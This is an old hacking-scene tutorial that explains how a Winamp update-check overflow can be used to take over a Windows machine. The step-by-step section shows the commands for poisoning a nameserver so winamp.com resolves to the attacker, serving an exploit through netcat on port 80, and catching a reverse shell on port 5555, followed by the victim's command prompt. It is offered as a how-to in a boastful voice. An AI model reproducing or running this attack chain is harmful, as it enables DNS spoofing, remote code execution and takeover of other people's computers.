How to Hack through Winamp
How Hackers Take over Through Winamp!!
Winamp has an option, enabled by default, which checks on startup for
the latest version from www.winamp.com and then notifies the user of
a possible upgrade via a message box.
Unfortunately, if it receives a huge response, the thread parsing the
data is thrown into an infinite loop and eventually the exception
dispatcher is called, and then, as happens most of the time under
Windows, a big, bad overflow occurs. I am attaching the real example.
Sample attack
=============
Nameserver - 192.168.0.1
attacker - 192.168.1.2
victim (windows machine) - 192.168.0.2
1) attacker poisons nameserver cache
192.168.1.2:
x@x:~$ ./p0ison 192.168.0.1 www.winamp.com 192.168.1.2
2) victim is now resolving www.winamp.com to attacker machine
192.168.0.2:
C:>nslookup www.winamp.com
Server: z3.names.int
Address: 192.168.0.1
Name: www.winamp.com
Address: 192.168.1.2
3) attacker fires up exploit as web daemon
192.168.1.2:
x@x:~$ (./wampexp 192.168.1.2 5555)|nc -l -p 80
4) attacker waits for connect-back by exploit
192.168.1.2:
x@x:~$ nc -l -p 5555
5) foolish winamp user opens winamp!
192.168.0.2:
opens winamp, prepares for The Weather Girls - It's Raining Men.mp3
6) BOOJAH!@
192.168.1.2:
x@x:~$ nc -l -p 5555
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.
C:>
/// control over machine taken